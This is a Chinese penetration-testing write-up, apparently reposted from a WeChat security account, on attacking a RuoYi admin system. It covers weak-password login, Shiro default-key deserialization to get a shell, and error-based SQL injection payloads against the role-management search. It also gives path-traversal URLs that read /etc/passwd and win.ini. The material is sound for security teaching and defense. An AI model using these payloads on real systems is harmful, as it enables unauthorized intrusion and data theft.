扫码领资料
获网安教程
前言:
发现一个弱口令进去后:
【魔方老师提醒才发现,这个蓝色的草丛其实可以大致判断是若依系统】
看这界面,是不是很像ruoyi
插件一看:
前端vue.js
【登录失败时bp抓包相应包有remeberMe=delete】
得知登录为shiro框架
八九不离十后台就是ruoyi框架的管理系统了
若依管理系统简介
找了个ruoyi系统的例图如下:
漏洞一:若依前台默认shiro key命令执行漏洞
若依默认使用shiro组件,所以可以试试shiro经典的反序列化 rememberMe漏洞来getshell。
直接工具一搜哈:
直接先爆破密钥,成功了血赚,失败了不亏,还有其他方法能得到AES的key
工具二搜哈:
【url和cookie配置好就直接搜哈】
这里发现了很多的漏洞:
[+] 存在Snakeyaml命令执行漏洞[+] 存在JdbcTemplate漏洞[+] 存在ReadFile(新)文件读取漏洞[+] 存在ReadFile(老)文件读取漏洞[+] 存在Thymeleaf模板注入漏洞[+] 存在SQL(1)注入漏洞[+] 存在SQL(2)注入漏洞[+] 存在SQL(3)注入漏洞[+] 存在Shiro框架[+] 存在默认key:xxxxx
拿着key去工具一:
然后检测利用链,检测成功后就可以命令执行getshell了:
漏洞二:若依后台存在多处sql注入漏洞
第一处:
角色管理的搜索,bp拦截抓包:
poc:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
poc2:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1),0x7e))
爆到库名点到为止
第二处:
也是角色管理,在导出这里
poc:params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
或者直接使用工具二
漏洞三:若依后台任意文件读取(CNVD-2021-01931)
/common/download/resource?resource=/profile/../../../../etc/passwd/common/download/resource?resource=/profile/../../../../Windows/win.ini
漏洞四:Thymeleaf模板注入漏洞
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):漏洞挖掘 | ruoyi框架管理系统漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论